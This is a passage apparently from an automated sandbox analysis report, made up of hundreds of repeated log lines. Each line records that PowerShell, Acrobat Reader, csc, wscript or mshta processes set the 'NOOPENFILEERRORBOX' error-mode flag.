            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
